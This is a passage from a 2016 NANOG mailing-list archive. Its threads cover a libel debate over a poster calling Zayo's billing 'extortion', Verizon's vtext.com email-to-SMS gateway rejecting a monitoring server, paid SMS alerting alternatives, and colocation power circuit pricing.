which case exasperating his opinion publicly is no less legal than me telling you that I don?t really think you?re a good lawyer. Good luck trying to play that card in a courtroom. Short and simple: One could threaten to sue over it, and one could even try. Personally, I?d turn that court room in to a circus act if someone tried. I?d most likely get fined in contempt a few times, but at least even the judge will go home laughing. :) J On 16 Aug 2016, at 16:45, Anne Mitchell > wrote: to say "our accounting system does not track invoice details -- it only shows the total amount due so your numbers mean nothing to us." All the while they relentlessly levied disconnect threats with short timelines such as: "if you don't pay us $128,000 by this Friday, we will shut your operation down." [...] At one point their lawyers and accounting people had the nerve to say "our accounting system does not track invoice details Are you talking with your SP's lawyers without your a legal team of your own present and advising you? I think one of the first things they should tell you is not to discuss pending disputes in public. Time to get a consultation with your own Lawyers to assist with billing dispute resolution, ASAP. Not to mention that accusing someone of a crime (extortion), in public (in this context I would argue that this is public, especially as the term 'community' was used in the allegation) is a pretty serious thing. Anne P. Mitchell, Attorney at Law Legislative Consultant CEO/President, SuretyMail Email Reputation Certification and Inbox Delivery Assistance http://www.SuretyMail.com/ http://www.SuretyMail.eu/ Available for consultations by special arrangement. Author: Section 6 of the CAN-SPAM Act of 2003 (the Federal anti-spam law) Member, California Bar Cyberspace Law Committee Member, Colorado Cybersecurity Consortium Member, Asilomar Microcomputer Workshop Committee Ret. Professor of Law, Lincoln Law School of San Jose Ret. Chair, Asilomar Microcomputer Workshop amitchell at isipp.com | @AnnePMitchell Facebook/AnnePMitchell | LinkedIn/in/annemitchell From mel at beckman.org Wed Aug 17 01:28:27 2016 From: mel at beckman.org (Mel Beckman) Date: Wed, 17 Aug 2016 01:28:27 +0000 Subject: Email to text - vtext.com blacklisting ip In-Reply-To: <361dcaa0-fc24-8e00-3705-a8144d8b9816@rollernet.us> References: <121b88b7-d06f-ae51-63bc-94e6e1919fc4@tiedyenetworks.com> <293701d1f816$8981f720$9c85e560$@SanDiegoBroadband.com>, <361dcaa0-fc24-8e00-3705-a8144d8b9816@rollernet.us> Message-ID: <0F6FF761-4013-4A99-980D-EEB24F500654@beckman.org> It's worth looking at the $40 Adafruit FONA cellular modem with inexpensive Ting month-to-month cellular service. We've been using it and it's great! I'm happy to share my simple Raspberry Pi serial port glue code that connects to Intermapper's paging interface via a local web service. Add a GPS board and you can make it double as a GPS-based time server, since FONA will extract time and latlong from GPS and make it accessible via the serial port. -mel beckman -mel beckman > On Aug 16, 2016, at 5:10 PM, Seth Mattinen wrote: > >> On 8/16/16 16:33, Sam Norris wrote: >> We are a Verizon subscriber so I am paying, it is not a free >> service. > > > Verizon does have an enterprise messaging service with API hooks, such as using SNPP instead of email-to-sms. > > ~Seth From bill at herrin.us Wed Aug 17 02:13:36 2016 From: bill at herrin.us (William Herrin) Date: Tue, 16 Aug 2016 22:13:36 -0400 Subject: Zayo Extortion In-Reply-To: <2803E274-0AFF-4AA5-B0D0-898457E34081@futuresouth.us> References: <0278F1AC-B23A-41FE-8908-DA37F06750D8@isipp.com> <2803E274-0AFF-4AA5-B0D0-898457E34081@futuresouth.us> Message-ID: On Tue, Aug 16, 2016 at 7:11 PM, Jonathan Hall wrote: > if I?m not mistaken (don?t worry, I?m not) - this doesn?t count > as ?slander? in any way, shape or form. Jonathan, Technically you're right, but not for the reason you think. Slander is verbal defamation. Libel is written defamation. The original poster has potentially exposed himself to a libel suit. > This mail thread is not any kind of valid FCC controlled or public > communications device, as the internet was actually excluded from > the public communications device list under the Freedom of Speech > Act in? Was it, 1996? Which means, ?slander? can?t be called in > this case. You could argue that it can, but you?d lose in court in the long run. There is no such thing as the "Freedom of Speech Act" in 1996 or any other year, and the FCC does not have the authority to nor has it involved itself in the regulation of speech in any medium. > If you?re aiming for the defamation card? That?s a very difficult one to prove. It's actually very, very simple. Did the defendant allege one or more facts about the plaintiff? Did the the alleged facts injure the plaintiff's reputation? Did the defendant prove that the alleged facts are true? Yes, Yes, No = liable for cash damages. Regards, Bill Herrin -- William Herrin ................ herrin at dirtside.com bill at herrin.us Owner, Dirtside Systems ......... Web: From johnl at iecc.com Wed Aug 17 03:51:35 2016 From: johnl at iecc.com (John Levine) Date: 17 Aug 2016 03:51:35 -0000 Subject: Email to text - vtext.com blacklisting ip In-Reply-To: Message-ID: <20160817035135.13219.qmail@ary.lan> In article you write: >If it's critical I'd suggest a service than can depended on... Pretty much any VoIP provider has an API you can use to send SMS for 5c each or less. Or if you're worried about your upstream connection dying, the cheap GSM modem is a good option. R's, John From paul at blacknight.com Tue Aug 16 20:44:19 2016 From: paul at blacknight.com (Paul Kelly :: Blacknight) Date: Tue, 16 Aug 2016 20:44:19 +0000 Subject: gm.com / opel.com Message-ID: <9D4F6632-A7F8-4046-9CE4-BF297229E4D1@blacknight.com> Hi there, Could someone who looks after the email for General Motors please contact me off list? Some of our customers are experiencing bounce backs sending you emails and it looks like it?s DNS related. Thanks, Paul Paul Kelly CTO Blacknight Internet Solutions Limited Cloud Hosting, Colocation, Dedicated servers, IP Transit Services ISO 27001:2013 Certified Tel: +353(0)599183072 Lo-call: 1850 929 929 DDI: +353 (0) 59 9183091 Skype: flamegrill e-mail: paul at blacknight.com web: http://www.blacknight.com Blacknight Internet Solutions Ltd, Unit 12A,Barrowside Business Park, Sleaty Road, Graiguecullen, Carlow, Ireland. Company No.: 370845 From sfischer1967 at gmail.com Wed Aug 17 01:42:52 2016 From: sfischer1967 at gmail.com (Steven Fischer) Date: Tue, 16 Aug 2016 21:42:52 -0400 Subject: Zayo Extortion In-Reply-To: <98886F8D-BB5A-4852-B32B-60D279D9F858@beckman.org> References: <0278F1AC-B23A-41FE-8908-DA37F06750D8@isipp.com> <2803E274-0AFF-4AA5-B0D0-898457E34081@futuresouth.us> <98886F8D-BB5A-4852-B32B-60D279D9F858@beckman.org> Message-ID: For the record: Extortion(n) Law. *the crime of obtaining money or some other thing of value by the abuse of one's office or authority.* Not sure if (according to the provided account) a service provider threatening to disable a critical business service unless rendered a sum of money the service provider cannot prove they are owed qualifies as extortion, but from the definition I found at dictionary.com, it is certainly seems to be in that general neighborhood. On Tue, Aug 16, 2016 at 9:24 PM, Mel Beckman wrote: > Jon, > > You're mistaken. This has nothing to do with being or not being an > FCC-controlled medium. It has to do with published statements that may not > be true -- which are classified as libel, not slander (slander is spoken, > libel is written). If you post it in a mailing list, or on Facebook, it's > legally considered published, as long as one other person not party to the > matter can view it. > > You're also mistaken about how the law works. The person making the > assertion has the burden of proof. If you say someone is an extortionist, > you'd better be able to prove it. All the plaintiff has to do is say "Your > honor, I've been libeled, and here are my damages. Please make the > defendant compensate me." You will be subpoenaed, and at court the judge > will turn to you and say "Where is the proof of your claims?" If you can't > deliver, the judgement will go against you. > > The plaintiff doesn't have to prove a thing. In fact, his claim will > automatically be accepted and processed by the legal system up until you > appear in court. The cost for you before that point could be thousands of > dollars. If you don't show up for court, you automatically lose. > > -mel beckman > > -mel beckman > > On Aug 16, 2016, at 4:12 PM, Jonathan Hall hall at futuresouth.us>> wrote: > > Excuse me for chiming in, here? But, if I?m not mistaken (don?t worry, I?m > not) - this doesn?t count as ?slander? in any way, shape or form. This mail > thread is not any kind of valid FCC controlled or public communications > device, as the internet was actually excluded from the public > communications device list under the Freedom of Speech Act in? Was it, > 1996? Which means, ?slander? can?t be called in this case. You could argue > that it can, but you?d lose in court in the long run. > > If you?re aiming for the defamation card? That?s a very difficult one to > prove. I?d counter the argument in a court room by asking the judge to > prove the plaintiff is NOT an extortionist scum bag. It certainly works > both ways. And either way, defamation requires some form of punitive damage > be proven in order to actually win that case. Are you saying that the > company he is referencing has some way to claim and directly correlate a > loss of income or potential loss of income, either present and/or future, > due to the comment made on a mail group? I?d love to see that > quantification on paper... > > None the less, regardless of what one accuses or says on the internet, the > usage of the word ?extortion? is quite open for interpretation with regards > to context, and making such a statement does not qualify for slander nor > defamation. He could feel he?s being extorted, in which case exasperating > his opinion publicly is no less legal than me telling you that I don?t > really think you?re a good lawyer. > > Good luck trying to play that card in a courtroom. > > Short and simple: One could threaten to sue over it, and one could even > try. Personally, I?d turn that court room in to a circus act if someone > tried. I?d most likely get fined in contempt a few times, but at least even > the judge will go home laughing. :) > > J > > On 16 Aug 2016, at 16:45, Anne Mitchell itchell at isipp.com>> wrote: > > > to say "our accounting system does not track invoice details -- it only > shows the total amount due so your numbers mean nothing to us." > All the while they relentlessly levied disconnect threats with short > timelines such as: "if you don't pay us $128,000 by this Friday, > we will shut your operation down." > [...] > At one point their lawyers and accounting people had the nerve to say "our > accounting system does not track invoice details > > Are you talking with your SP's lawyers without your a legal team of > your own present and advising you? > I think one of the first things they should tell you is not to discuss > pending disputes in public. Time to get > a consultation with your own Lawyers to assist with billing dispute > resolution, ASAP. > > Not to mention that accusing someone of a crime (extortion), in public (in > this context I would argue that this is public, especially as the term > 'community' was used in the allegation) is a pretty serious thing. > > Anne P. Mitchell, > Attorney at Law > Legislative Consultant > CEO/President, > SuretyMail Email Reputation Certification and Inbox Delivery Assistance > http://www.SuretyMail.com/ > http://www.SuretyMail.eu/ > > Available for consultations by special arrangement. > > Author: Section 6 of the CAN-SPAM Act of 2003 (the Federal anti-spam law) > Member, California Bar Cyberspace Law Committee > Member, Colorado Cybersecurity Consortium > Member, Asilomar Microcomputer Workshop Committee > Ret. Professor of Law, Lincoln Law School of San Jose > Ret. Chair, Asilomar Microcomputer Workshop > amitchell at isipp.com | @AnnePMitchell > Facebook/AnnePMitchell | LinkedIn/in/annemitchell > > > > -- To him who is able to keep you from falling and to present you before his glorious presence without fault and with great joy From larrysheldon at cox.net Wed Aug 17 05:03:11 2016 From: larrysheldon at cox.net (Larry Sheldon) Date: Wed, 17 Aug 2016 00:03:11 -0500 Subject: Zayo Extortion In-Reply-To: References: <0278F1AC-B23A-41FE-8908-DA37F06750D8@isipp.com> <2803E274-0AFF-4AA5-B0D0-898457E34081@futuresouth.us> Message-ID: On 8/16/2016 21:13, William Herrin wrote: > On Tue, Aug 16, 2016 at 7:11 PM, Jonathan Hall wrote: >> if I?m not mistaken (don?t worry, I?m not) - this doesn?t count >> as ?slander? in any way, shape or form. > > Jonathan, > > Technically you're right, but not for the reason you think. Slander is > verbal defamation. Libel is written defamation. The original poster > has potentially exposed himself to a libel suit. But what are the BGP implications? -- "Everybody is a genius. But if you judge a fish by its ability to climb a tree, it will live its whole life believing that it is stupid." --Albert Einstein From Larry's Cox account. From jam at zoidtechnologies.com Wed Aug 17 05:18:03 2016 From: jam at zoidtechnologies.com (Jeff) Date: Wed, 17 Aug 2016 01:18:03 -0400 Subject: Email to text - vtext.com blacklisting ip In-Reply-To: <20160817035135.13219.qmail@ary.lan> References: <20160817035135.13219.qmail@ary.lan> Message-ID: <57B3F38B.8090104@zoidtechnologies.com> greetings, On 08/16/2016 11:51 PM, John Levine wrote: > In article you write: >> If it's critical I'd suggest a service than can depended on... > > Pretty much any VoIP provider has an API you can use to send SMS for > 5c each or less. Or if you're worried about your upstream connection > dying, the cheap GSM modem is a good option. > > R's, > John > honestly, if the backhauls to your NOC go down, you will not be able to send email-to-sms messages at all. a dial-up solution with a fee is the best option, imho. also best to use a 'collapsible rover' to keep pages to a minimum ;) (with a proper nod to the internet of 1996) regards, J From dovid at telecurve.com Wed Aug 17 09:31:37 2016 From: dovid at telecurve.com (Dovid Bender) Date: Wed, 17 Aug 2016 05:31:37 -0400 Subject: Email to text - vtext.com blacklisting ip In-Reply-To: <293701d1f816$8981f720$9c85e560$@SanDiegoBroadband.com> References: <121b88b7-d06f-ae51-63bc-94e6e1919fc4@tiedyenetworks.com> <293701d1f816$8981f720$9c85e560$@SanDiegoBroadband.com> Message-ID: We use Zang.io and are very happy. Be careful when using long codes (10 digit numbers) as if you send too many messages out in a day (500+) the larger carriers such as Verizon will start blocking you. As Jeff mentioned if your monitoring tool is onsite and the internet goes down then it's worthless. In our case it's in another DC so if everything goes down we still get alerts. You can also try twilio and telnyx. On Tue, Aug 16, 2016 at 7:33 PM, Sam Norris wrote: > Same boat... We are sending messages to PHONENUMBER at vtext.com and getting > bouncebacks or lost items. I assume its because some limits are now being > put > into place. We are a Verizon subscriber so I am paying, it is not a free > service. But .... I am totally up for paid services if you can recommend > some > that will reliably get us texts to our verizon phones. > > Sam > > > > -----Original Message----- > > From: NANOG [mailto:nanog-bounces at nanog.org] On Behalf Of Ryan, Spencer > > Sent: Tuesday, August 16, 2016 4:17 PM > > To: Josh Luthman; Mike > > Cc: NANOG list > > Subject: RE: Email to text - vtext.com blacklisting ip > > > > I agree. Pay Pager duty or a SMS gateway with a SLA. Relying on the free > service > > for anything critical is asking for trouble. > > > > > > > > Sent from my Verizon, Samsung Galaxy smartphone > > > > > > -------- Original message -------- > > From: Josh Luthman > > Date: 8/16/16 6:09 PM (GMT-05:00) > > To: Mike > > Cc: NANOG list > > Subject: Re: Email to text - vtext.com blacklisting ip > > > > If it's critical I'd suggest a service than can depended on... > > > > Josh Luthman > > Office: 937-552-2340 > > Direct: 937-552-2343 > > 1100 Wayne St > > Suite 1337 > > Troy, OH 45373 > > > > On Aug 16, 2016 5:45 PM, "Mike" wrote: > > > > > Hi, > > > > > > > > > I have a server that monitors my network and issues text messages > if > > > there are events of note that require human intervention. There is some > > > process filtering that ensures it also is not able to issue more than 1 > > > alert maximum per 5 minutes, to ensure it doesn't flood pagers with > > > messages all screaming the sky is falling when things are not going > well. > > > Recently however, this server is no longer able to deliver messages to > > > vtext.com - it gets nothing but 554 errors: > > > > > > > > > telnet 69.78.67.53 25 > > > Trying 69.78.67.53... > > > Connected to 69.78.67.53. > > > Escape character is '^]'. > > > 554 txslspamp10.vtext.com > > > Connection closed by foreign host. > > > > > > Granted on some days during challenging times it can send 30 or 40 > > > messages before we get to it and get it squelched / silenced, but it's > > > otherwise reasonably well behaved IMHO and I don't think we are any > heavy > > > volume sender. So I am trying to figure out why it's blacklisted then > and > > > am rolling snake eyes. If anyone who is an admin for verizon or who > has > > > any insight to share I'd certainly appreciate it. Email to text is a > > > critical function we depend on. > > > > > > > > > Thank you. > > > > > > > > > > > From Valdis.Kletnieks at vt.edu Wed Aug 17 13:01:57 2016 From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu) Date: Wed, 17 Aug 2016 09:01:57 -0400 Subject: Zayo Extortion In-Reply-To: <2803E274-0AFF-4AA5-B0D0-898457E34081@futuresouth.us> References: <0278F1AC-B23A-41FE-8908-DA37F06750D8@isipp.com> <2803E274-0AFF-4AA5-B0D0-898457E34081@futuresouth.us> Message-ID: <56221.1471438917@turing-police.cc.vt.edu> On Wed, 17 Aug 2016 01:11:09 +0200, Jonathan Hall said: > And either way, defamation requires some form of punitive damage be proven in > order to act ually win that case. In addition to the other things already pointed out, punitive damage doesn't need to be proven. *Actual* damages have to be proven. Punitive damages are damages added as punishment, to make sure the responsible party learned their lesson. So fir instance, if a corporation's negligence results in a worker's death, his family may be awarded $5M in actual damages for the loss of their loved one - and then another $20 million in punitive damages, to make the corporation (and possibly the industry segment as a whole) take notice that sort of negligent behavior will not be tolerated.... -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 848 bytes Desc: not available URL: From littlefishguy at gmail.com Wed Aug 17 14:46:56 2016 From: littlefishguy at gmail.com (Scott Fisher) Date: Wed, 17 Aug 2016 10:46:56 -0400 Subject: Email to text - vtext.com blacklisting ip In-Reply-To: References: <121b88b7-d06f-ae51-63bc-94e6e1919fc4@tiedyenetworks.com> <293701d1f816$8981f720$9c85e560$@SanDiegoBroadband.com> Message-ID: This subject pops up every 6 months and it's a problem that can be solved 100 ways. One way we did it at Team Cymru was install a foxbox sms gateway in our datacenter. It was a pain to get working, (mainly due to some miscommunication with the Italian support team), but one we got past a few problems it works flawlessly for all alerts. If alerts are unack'd for a specific amount of time, escalation alerts go out via email-to-sms AND SMS to a broader group to ensure someone gets the message. Thanks, Scott On Wed, Aug 17, 2016 at 5:31 AM, Dovid Bender wrote: > We use Zang.io and are very happy. Be careful when using long codes (10 > digit numbers) as if you send too many messages out in a day (500+) the > larger carriers such as Verizon will start blocking you. As Jeff mentioned > if your monitoring tool is onsite and the internet goes down then it's > worthless. In our case it's in another DC so if everything goes down we > still get alerts. You can also try twilio and telnyx. > > > On Tue, Aug 16, 2016 at 7:33 PM, Sam Norris > wrote: > > > Same boat... We are sending messages to PHONENUMBER at vtext.com and > getting > > bouncebacks or lost items. I assume its because some limits are now > being > > put > > into place. We are a Verizon subscriber so I am paying, it is not a free > > service. But .... I am totally up for paid services if you can recommend > > some > > that will reliably get us texts to our verizon phones. > > > > Sam > > > > > > > -----Original Message----- > > > From: NANOG [mailto:nanog-bounces at nanog.org] On Behalf Of Ryan, > Spencer > > > Sent: Tuesday, August 16, 2016 4:17 PM > > > To: Josh Luthman; Mike > > > Cc: NANOG list > > > Subject: RE: Email to text - vtext.com blacklisting ip > > > > > > I agree. Pay Pager duty or a SMS gateway with a SLA. Relying on the > free > > service > > > for anything critical is asking for trouble. > > > > > > > > > > > > Sent from my Verizon, Samsung Galaxy smartphone > > > > > > > > > -------- Original message -------- > > > From: Josh Luthman > > > Date: 8/16/16 6:09 PM (GMT-05:00) > > > To: Mike > > > Cc: NANOG list > > > Subject: Re: Email to text - vtext.com blacklisting ip > > > > > > If it's critical I'd suggest a service than can depended on... > > > > > > Josh Luthman > > > Office: 937-552-2340 > > > Direct: 937-552-2343 > > > 1100 Wayne St > > > Suite 1337 > > > Troy, OH 45373 > > > > > > On Aug 16, 2016 5:45 PM, "Mike" wrote: > > > > > > > Hi, > > > > > > > > > > > > I have a server that monitors my network and issues text messages > > if > > > > there are events of note that require human intervention. There is > some > > > > process filtering that ensures it also is not able to issue more > than 1 > > > > alert maximum per 5 minutes, to ensure it doesn't flood pagers with > > > > messages all screaming the sky is falling when things are not going > > well. > > > > Recently however, this server is no longer able to deliver messages > to > > > > vtext.com - it gets nothing but 554 errors: > > > > > > > > > > > > telnet 69.78.67.53 25 > > > > Trying 69.78.67.53... > > > > Connected to 69.78.67.53. > > > > Escape character is '^]'. > > > > 554 txslspamp10.vtext.com > > > > Connection closed by foreign host. > > > > > > > > Granted on some days during challenging times it can send 30 or 40 > > > > messages before we get to it and get it squelched / silenced, but > it's > > > > otherwise reasonably well behaved IMHO and I don't think we are any > > heavy > > > > volume sender. So I am trying to figure out why it's blacklisted then > > and > > > > am rolling snake eyes. If anyone who is an admin for verizon or who > > has > > > > any insight to share I'd certainly appreciate it. Email to text is a > > > > critical function we depend on. > > > > > > > > > > > > Thank you. > > > > > > > > > > > > > > > > > -- Scott From josh at imaginenetworksllc.com Wed Aug 17 14:53:21 2016 From: josh at imaginenetworksllc.com (Josh Luthman) Date: Wed, 17 Aug 2016 10:53:21 -0400 Subject: Email to text - vtext.com blacklisting ip In-Reply-To: References: <121b88b7-d06f-ae51-63bc-94e6e1919fc4@tiedyenetworks.com> <293701d1f816$8981f720$9c85e560$@SanDiegoBroadband.com> Message-ID: Just a heads up to everyone with these suggestions, Mike is complaining the thought of using a paid service for a "critical" function to be a waste of bandwidth. He will then block your email address. Just thought I'd save everyone's time from trying to help him. He is only concerned about fixing the free service and not a solution to the problem. Josh Luthman Office: 937-552-2340 Direct: 937-552-2343 1100 Wayne St Suite 1337 Troy, OH 45373 On Aug 17, 2016 10:48 AM, "Scott Fisher" wrote: > This subject pops up every 6 months and it's a problem that can be solved > 100 ways. One way we did it at Team Cymru was install a foxbox sms gateway > in our datacenter. It was a pain to get working, (mainly due to some > miscommunication with the Italian support team), but one we got past a few > problems it works flawlessly for all alerts. If alerts are unack'd for a > specific amount of time, escalation alerts go out via email-to-sms AND SMS > to a broader group to ensure someone gets the message. > > Thanks, > Scott > > On Wed, Aug 17, 2016 at 5:31 AM, Dovid Bender wrote: > > > We use Zang.io and are very happy. Be careful when using long codes (10 > > digit numbers) as if you send too many messages out in a day (500+) the > > larger carriers such as Verizon will start blocking you. As Jeff > mentioned > > if your monitoring tool is onsite and the internet goes down then it's > > worthless. In our case it's in another DC so if everything goes down we > > still get alerts. You can also try twilio and telnyx. > > > > > > On Tue, Aug 16, 2016 at 7:33 PM, Sam Norris > > wrote: > > > > > Same boat... We are sending messages to PHONENUMBER at vtext.com and > > getting > > > bouncebacks or lost items. I assume its because some limits are now > > being > > > put > > > into place. We are a Verizon subscriber so I am paying, it is not a > free > > > service. But .... I am totally up for paid services if you can > recommend > > > some > > > that will reliably get us texts to our verizon phones. > > > > > > Sam > > > > > > > > > > -----Original Message----- > > > > From: NANOG [mailto:nanog-bounces at nanog.org] On Behalf Of Ryan, > > Spencer > > > > Sent: Tuesday, August 16, 2016 4:17 PM > > > > To: Josh Luthman; Mike > > > > Cc: NANOG list > > > > Subject: RE: Email to text - vtext.com blacklisting ip > > > > > > > > I agree. Pay Pager duty or a SMS gateway with a SLA. Relying on the > > free > > > service > > > > for anything critical is asking for trouble. > > > > > > > > > > > > > > > > Sent from my Verizon, Samsung Galaxy smartphone > > > > > > > > > > > > -------- Original message -------- > > > > From: Josh Luthman > > > > Date: 8/16/16 6:09 PM (GMT-05:00) > > > > To: Mike > > > > Cc: NANOG list > > > > Subject: Re: Email to text - vtext.com blacklisting ip > > > > > > > > If it's critical I'd suggest a service than can depended on... > > > > > > > > Josh Luthman > > > > Office: 937-552-2340 > > > > Direct: 937-552-2343 > > > > 1100 Wayne St > > > > Suite 1337 > > > > Troy, OH 45373 > > > > > > > > On Aug 16, 2016 5:45 PM, "Mike" > wrote: > > > > > > > > > Hi, > > > > > > > > > > > > > > > I have a server that monitors my network and issues text > messages > > > if > > > > > there are events of note that require human intervention. There is > > some > > > > > process filtering that ensures it also is not able to issue more > > than 1 > > > > > alert maximum per 5 minutes, to ensure it doesn't flood pagers with > > > > > messages all screaming the sky is falling when things are not going > > > well. > > > > > Recently however, this server is no longer able to deliver messages > > to > > > > > vtext.com - it gets nothing but 554 errors: > > > > > > > > > > > > > > > telnet 69.78.67.53 25 > > > > > Trying 69.78.67.53... > > > > > Connected to 69.78.67.53. > > > > > Escape character is '^]'. > > > > > 554 txslspamp10.vtext.com > > > > > Connection closed by foreign host. > > > > > > > > > > Granted on some days during challenging times it can send 30 or 40 > > > > > messages before we get to it and get it squelched / silenced, but > > it's > > > > > otherwise reasonably well behaved IMHO and I don't think we are any > > > heavy > > > > > volume sender. So I am trying to figure out why it's blacklisted > then > > > and > > > > > am rolling snake eyes. If anyone who is an admin for verizon or > who > > > has > > > > > any insight to share I'd certainly appreciate it. Email to text is > a > > > > > critical function we depend on. > > > > > > > > > > > > > > > Thank you. > > > > > > > > > > > > > > > > > > > > > > > > > > > -- > Scott > From mel at beckman.org Wed Aug 17 15:09:30 2016 From: mel at beckman.org (Mel Beckman) Date: Wed, 17 Aug 2016 15:09:30 +0000 Subject: Email to text - vtext.com blacklisting ip In-Reply-To: References: <121b88b7-d06f-ae51-63bc-94e6e1919fc4@tiedyenetworks.com> <293701d1f816$8981f720$9c85e560$@SanDiegoBroadband.com> Message-ID: That?s fine. The surrounding discussion is likely helpful to other nanogen. -mel > On Aug 17, 2016, at 7:53 AM, Josh Luthman wrote: > > Just a heads up to everyone with these suggestions, Mike is complaining the > thought of using a paid service for a "critical" function to be a waste of > bandwidth. He will then block your email address. > > Just thought I'd save everyone's time from trying to help him. He is only > concerned about fixing the free service and not a solution to the problem. > > Josh Luthman > Office: 937-552-2340 > Direct: 937-552-2343 > 1100 Wayne St > Suite 1337 > Troy, OH 45373 > > On Aug 17, 2016 10:48 AM, "Scott Fisher" wrote: > >> This subject pops up every 6 months and it's a problem that can be solved >> 100 ways. One way we did it at Team Cymru was install a foxbox sms gateway >> in our datacenter. It was a pain to get working, (mainly due to some >> miscommunication with the Italian support team), but one we got past a few >> problems it works flawlessly for all alerts. If alerts are unack'd for a >> specific amount of time, escalation alerts go out via email-to-sms AND SMS >> to a broader group to ensure someone gets the message. >> >> Thanks, >> Scott >> >> On Wed, Aug 17, 2016 at 5:31 AM, Dovid Bender wrote: >> >>> We use Zang.io and are very happy. Be careful when using long codes (10 >>> digit numbers) as if you send too many messages out in a day (500+) the >>> larger carriers such as Verizon will start blocking you. As Jeff >> mentioned >>> if your monitoring tool is onsite and the internet goes down then it's >>> worthless. In our case it's in another DC so if everything goes down we >>> still get alerts. You can also try twilio and telnyx. >>> >>> >>> On Tue, Aug 16, 2016 at 7:33 PM, Sam Norris >>> wrote: >>> >>>> Same boat... We are sending messages to PHONENUMBER at vtext.com and >>> getting >>>> bouncebacks or lost items. I assume its because some limits are now >>> being >>>> put >>>> into place. We are a Verizon subscriber so I am paying, it is not a >> free >>>> service. But .... I am totally up for paid services if you can >> recommend >>>> some >>>> that will reliably get us texts to our verizon phones. >>>> >>>> Sam >>>> >>>> >>>>> -----Original Message----- >>>>> From: NANOG [mailto:nanog-bounces at nanog.org] On Behalf Of Ryan, >>> Spencer >>>>> Sent: Tuesday, August 16, 2016 4:17 PM >>>>> To: Josh Luthman; Mike >>>>> Cc: NANOG list >>>>> Subject: RE: Email to text - vtext.com blacklisting ip >>>>> >>>>> I agree. Pay Pager duty or a SMS gateway with a SLA. Relying on the >>> free >>>> service >>>>> for anything critical is asking for trouble. >>>>> >>>>> >>>>> >>>>> Sent from my Verizon, Samsung Galaxy smartphone >>>>> >>>>> >>>>> -------- Original message -------- >>>>> From: Josh Luthman >>>>> Date: 8/16/16 6:09 PM (GMT-05:00) >>>>> To: Mike >>>>> Cc: NANOG list >>>>> Subject: Re: Email to text - vtext.com blacklisting ip >>>>> >>>>> If it's critical I'd suggest a service than can depended on... >>>>> >>>>> Josh Luthman >>>>> Office: 937-552-2340 >>>>> Direct: 937-552-2343 >>>>> 1100 Wayne St >>>>> Suite 1337 >>>>> Troy, OH 45373 >>>>> >>>>> On Aug 16, 2016 5:45 PM, "Mike" >> wrote: >>>>> >>>>>> Hi, >>>>>> >>>>>> >>>>>> I have a server that monitors my network and issues text >> messages >>>> if >>>>>> there are events of note that require human intervention. There is >>> some >>>>>> process filtering that ensures it also is not able to issue more >>> than 1 >>>>>> alert maximum per 5 minutes, to ensure it doesn't flood pagers with >>>>>> messages all screaming the sky is falling when things are not going >>>> well. >>>>>> Recently however, this server is no longer able to deliver messages >>> to >>>>>> vtext.com - it gets nothing but 554 errors: >>>>>> >>>>>> >>>>>> telnet 69.78.67.53 25 >>>>>> Trying 69.78.67.53... >>>>>> Connected to 69.78.67.53. >>>>>> Escape character is '^]'. >>>>>> 554 txslspamp10.vtext.com >>>>>> Connection closed by foreign host. >>>>>> >>>>>> Granted on some days during challenging times it can send 30 or 40 >>>>>> messages before we get to it and get it squelched / silenced, but >>> it's >>>>>> otherwise reasonably well behaved IMHO and I don't think we are any >>>> heavy >>>>>> volume sender. So I am trying to figure out why it's blacklisted >> then >>>> and >>>>>> am rolling snake eyes. If anyone who is an admin for verizon or >> who >>>> has >>>>>> any insight to share I'd certainly appreciate it. Email to text is >> a >>>>>> critical function we depend on. >>>>>> >>>>>> >>>>>> Thank you. >>>>>> >>>>>> >>>>>> >>>> >>>> >>> >> >> >> >> -- >> Scott >> From eric.kuhnke at gmail.com Wed Aug 17 16:37:55 2016 From: eric.kuhnke at gmail.com (Eric Kuhnke) Date: Wed, 17 Aug 2016 09:37:55 -0700 Subject: Comparing carrier hotels and colo: How much are you paying per 208V 30A circuit Message-ID: a) How much, in $/mo b) To what degree is it protected (1+0 generator, 1+1 generator, N+1 generator, single UPS, 1+1 UPS, etc). c) What extent of diversity were you able to obtain vs. your other AC circuits (unique riser? separate transformer? separate power feed from second route into the building?) From patrick at ianai.net Wed Aug 17 16:41:57 2016 From: patrick at ianai.net (Patrick W. Gilmore) Date: Wed, 17 Aug 2016 12:41:57 -0400 Subject: Comparing carrier hotels and colo: How much are you paying per 208V 30A circuit In-Reply-To: References: Message-ID: <7017A8B6-F9C3-4818-98B7-9896C6B9BF06@ianai.net> L6-30s are probably the most common power drop in colocation. A) Is proprietary. I won?t pretend you will get zero answers, lots of people will likely break their NDAs. B) You can find any and all of those options. C) Ditto. Are you looking for specific cities or buildings? Or just trying to see if it is available? -- TTFN, patrick > On Aug 17, 2016, at 12:37 PM, Eric Kuhnke wrote: > > a) How much, in $/mo > > b) To what degree is it protected (1+0 generator, 1+1 generator, N+1 > generator, single UPS, 1+1 UPS, etc). > > c) What extent of diversity were you able to obtain vs. your other AC > circuits (unique riser? separate transformer? separate power feed from > second route into the building?) From eric.kuhnke at gmail.com Wed Aug 17 16:48:22 2016 From: eric.kuhnke at gmail.com (Eric Kuhnke) Date: Wed, 17 Aug 2016 09:48:22 -0700 Subject: Comparing carrier hotels and colo: How much are you paying per 208V 30A circuit In-Reply-To: <7017A8B6-F9C3-4818-98B7-9896C6B9BF06@ianai.net> References: <7017A8B6-F9C3-4818-98B7-9896C6B9BF06@ianai.net> Message-ID: Of course I know all of the above exist and are available. Looking more into the cost difference between facilities that sell 'basic' backed power (where you absolutely need to install your own rectifier and battery plant) vs facilities that sell 30A circuits they claim meet the definition of high availability. I have seen a lot of prices already and know that just the $/MRC for power is occasionally not under NDA, so those who wish to share their costs might do so in a general way without naming a specific facility... Looking at west coast states (CA/OR/WA) primarily. On Wed, Aug 17, 2016 at 9:41 AM, Patrick W. Gilmore wrote: > L6-30s are probably the most common power drop in colocation. > > A) Is proprietary. I won?t pretend you will get zero answers, lots of > people will likely break their NDAs. > > B) You can find any and all of those options. > > C) Ditto. > > Are you looking for specific cities or buildings? Or just trying to see if > it is available? > > -- > TTFN, > patrick > > > On Aug 17, 2016, at 12:37 PM, Eric Kuhnke wrote: > > > > a) How much, in $/mo > > > > b) To what degree is it protected (1+0 generator, 1+1 generator, N+1 > > generator, single UPS, 1+1 UPS, etc). > > > > c) What extent of diversity were you able to obtain vs. your other AC > > circuits (unique riser? separate transformer? separate power feed from > > second route into the building?) > > From keiths at 